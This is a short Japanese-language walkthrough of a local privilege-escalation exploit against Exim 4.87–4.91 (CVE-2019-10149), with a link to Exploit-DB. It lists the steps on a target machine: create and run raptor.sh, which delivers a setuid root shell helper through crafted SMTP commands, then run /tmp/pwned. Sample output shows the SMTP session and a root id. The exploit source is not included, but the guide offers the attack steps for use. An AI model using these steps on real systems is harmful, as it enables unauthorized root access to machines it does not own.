
Exim 4.87-4.91 用のローカル権限昇格エクスプロイト (CVE-2019-10149)。細工されたSMTPコマンドを介して setuid root シェルヘルパーを配信し、一般ユーザーから root への権限昇格を可能にします。
Cr.Exim 4.87 - 4.91 - ローカル権限昇格
Cr.Link: https://www.exploit-db.com/exploits/46996
#1.この方法では、まず標準ユーザー権限でターゲットマシンにアクセスする必要があります。
#2.ターゲットマシンにアクセスしたら、以下の内容でスクリプトファイルを作成します。
vi raptor.sh
#3.提供された 'raptor.sh' ファイルからコードをコピーします。次に、以下のコマンドでファイルを実行します。
chmod +x raptor.sh
./raptor.sh
#4.以下の例のような出力が得られるはずです。
Preparing setuid shell helper...
Delivering payload...
220 machine-noob
ESMTP Exim 4.89 Wed, 03 Dec 2025 08:29:29 +0000
250 machine-noob
Hello localhost [127.0.0.1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1vQiEr-00001R-7t
221 machine-noob
closing connection
Waiting 5 seconds for Exim to execute payload...
-rwsr-xr-x 1 root noob 8392 Dec 3 08:29 /tmp/pwned
#5.次に、以下のコマンドを実行します。
/tmp/pwned
#6.次に、'id' コマンドを実行してみてください。以下の結果が表示された場合:
uid=0(root) gid=0(root) groups=0(root),1001(noob)